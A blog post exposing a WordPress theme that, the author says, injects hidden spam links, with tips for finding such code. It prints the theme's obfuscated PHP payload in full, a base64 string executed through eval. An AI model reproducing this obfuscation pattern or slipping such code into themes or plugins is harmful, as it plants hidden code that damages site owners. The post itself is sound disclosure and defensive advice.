WordPress Theme SpamWare Alert – PaddSolutions wordpress themes pumping out hidden spam links.

If you’re trying to do blackhat SEO, at least be clever about it. It seems that Padd Solutions are not very clever at all. They have designed some nice WordPress themes, one of which my cousin decided to use on her company website. She had some issues removing a footer attribution link, which led me to dig into the tungstenation/ template code. What I found was very shocking.

The PaddSolutions Tungstenation theme is a spam tool – and it injects hidden, unwanted spammy SUV links into your page markup, which may actually cause you to get booted from google for performing “blackhat SEO”, while you are just an innocent customer who used a theme in good faith.

WordPress Theme hidden spam links – by Padd Solutions (Click to Enlarge)

Do you want these thieves stealing link equity from your web-site and pushing risk to you that your web-site will get penalised?

The SpamWare WordPress Theme: Tungstenation – under the hood

I downloaded the theme in question and tried it out of the box. it and looked at /includes/prelude.php

This line looked suspicious. Why encode or obfuscate anything?

$_X='Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCmYzbmN0NDJuIHAxZGRfdGg1bTVfY3I1ZDR0cygpIHsNCglnbDJiMWwgJHAxZGRfZzM0ZDsNCgkkY3I1ZDR0cyA9ICdENXM0Z241ZCBieSA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkI1c3QgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC8iPkI1c3QgU1VWPC8xPiA0biBjMjJwNXIxdDQybiB3NHRoIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iQTNkNCBTVVYiIGhyNWY9Imh0dHA6Ly9zM3YucjV2NDV3NHQybmw0bjUubjV0LzEzZDQtczN2LyI+QTNkNCBTVVY8LzE+LCA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkluZjRuNHQ0IFNVViIgaHI1Zj0iaHR0cDovL3Mzdi5yNXY0NXc0dDJubDRuNS5uNXQvNG5mNG40dDQtczN2LyI+SW5mNG40dDQgU1VWPC8xPiwgMW5kIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iTDV4M3MgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC9sNXgzcy1zM3YvIj5MNXgzcyBTVVY8LzE+JzsNCgkkcDFkZF9nMzRkID0gJ2M1NW9lMDBpLTA1NzktdWRjOS04b2U3LTgwY2ZiNmlvOGJjZSc7DQoJJG01bjMgPSB3cF9uMXZfbTVuMygxcnIxeSgNCgkJJzVjaDInID0+IGYxbHM1LA0KCQkndGg1bTVfbDJjMXQ0Mm4nID0+ICdmMjJ0NXInLA0KCQknYzJudDE0bjVyJyA9PiBmMWxzNSwNCgkJJzR0NW1zX3dyMXAnID0+ICclbyRzJywNCgkJJ3cxbGs1cicgPT4gbjV3IFAxZGRfVGg1bTVfVzFsazVyX0lubDRuNV9NNW4zKCksDQoJKSk7DQoJJG01bjMgPSBzM2JzdHIoJG01bjMsIDAsIHN0cmw1bigkbTVuMykgLSBzdHJsNW4oJzxzcDFuIGNsMXNzPSJwNHA1Ij4gfCA8L3NwMW4+JykpOw0KCTVjaDIgJzxwIGNsMXNzPSJtNW4zIj4nLCAkbTVuMywgJzxiciAvPic7DQogICAgIDVjaDIgJzwxIGhyNWY9Imh0dHA6Ly93d3cucDFkZHMybDN0NDJucy5jMm0vIiB0NHRsNT0iRnI1NSBXMnJkUHI1c3MgdGg1bTVzIiB0MXJnNXQ9Il9ibDFuayI+RnI1NSBXMnJkUHI1c3MgdGg1bTVzPC8xPiBieSBQMWRkIFMybDN0NDJucy48L3A+JzsNCgk1Y2gyICc8cCBjbDFzcz0iMW5uMnQxdDQybiI+Jywgc3ByNG50ZihfXygnQzJweXI0Z2h0ICZjMnB5OyAlNiRzLiAlYSRzLiBBbGwgcjRnaHRzIHI1czVydjVkLicsIFBBRERfVEhFTUVfU0xVRyksIGQxdDUoJ1knKSwgZzV0X2JsMmc0bmYyKCduMW01JykpLCAnIDxiciAvPic7DQoJNWNoMiAkY3I1ZDR0cywgICc8L3A+JzsNCgk1Y2gyICc8ZDR2IGNsMXNzPSJjbDUxciI+PC9kNHY+JzsNCn0NCg0KZjNuY3Q0Mm4gcDFkZF90aDVtNV9wcjVsM2Q1X2I1ZzRuKCkgew0KCTJiX3N0MXJ0KCk7DQp9DQoxZGRfMWN0NDJuKCd3cF9oNTFkJywgJ3AxZGRfdGg1bTVfcHI1bDNkNV9iNWc0bicpOw0KDQpmM25jdDQybiBwMWRkX3RoNW01X3ByNWwzZDVfNW5kKCkgew0KCSRjMm50NW50cyA9IDJiX2c1dF9jMm50NW50cygpOw0KCTJiX2c1dF9jbDUxbigpOw0KCWdsMmIxbCAkcDFkZF9nMzRkOw0KCTRmICghNW1wdHkoJHAxZGRfZzM0ZCkgJiYgKGYzbmN0NDJuXzV4NHN0cygncDFkZF90aDVtNV9jcjVkNHRzJykpKSB7DQoJCTRmICgkcDFkZF9nMzRkID09PSAnYzU1b2UwMGktMDU3OS11ZGM5LThvZTctODBjZmI2aW84YmNlJykgew0KCQkJNWNoMiAkYzJudDVudHM7DQoJCX0gNWxzNSB7DQoJCQl3cF9kNDUoJ1MybTV0aDRuZyB3cjJuZy4nKTsNCgkJfQ0KCX0gNWxzNSB7DQoJCXdwX2Q0NSgnUzJtNXRoNG5nIHdyMm5nLicpOw0KCX0NCn0NCjFkZF8xY3Q0Mm4oJ3dwX2YyMnQ1cicsICdwMWRkX3RoNW01X3ByNWwzZDVfNW5kJyk7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));

I tried a base64 decoder which I found on google to unravel the mystery of this code – however it said something in the string was corrupted, so I posted the dump on Pastebin and asked for help decoding the string on my twitter account. Thanks to Sam Harries who decoded the string (PHP’s Eval() is your friend, apparently). Once decoded we can make out a slightly encrypted php script / functions [it looks like some old-school script kiddies wishing they were 31337 - but they were just l4mer5 imo] which inject hidden spammy SUV links into the markup [footer]:

WordPress Theme spam by Padd Solutions (Click to Enlarge)

How to avoid SpamWare in WordPress Themes

there’s a bunch of ways to avoid this stuff happening to you, as well as to detect and remove spamware from themes and plugins:

• Download themes/plugins only from official source – usually.. just not this time…
• View the page source of your content pages! You should be doing this as a matter of course to seach for anything out of place (and If you’re a SEO you should be on intimate terms with every tag and attribute in your markup;))
• Search for “base64″ in any plugins or themes – use a decoder to see what’s really going on if you find base64 encoded strings and if things seem suspicious
• Check WP-Options – There is a great place for these spam-masters to hide these injected html links/codes in your site to avoid easy detection. It is not in the source or template – but in your wp-options table (so searching pages/posts and trawling templates won’t reveal a thing) but in your wp-options table. You can check [and edit] the contents of these fields should you find anything dubious via http://yoursite.com/wp-admin/options.php. Do a quick search for the offending domainname and bob may just be your uncle

It will be interesting to see what action (if any) big Google takes when they find out about this. Maybe action has already been taken.<rhetoric>Google has amazing spam-proof algorithms, right? </rhetoric>

If you're new here, you may want to subscribe to my RSS feed or check out my Twitter Page. Thanks for visiting!

No related posts.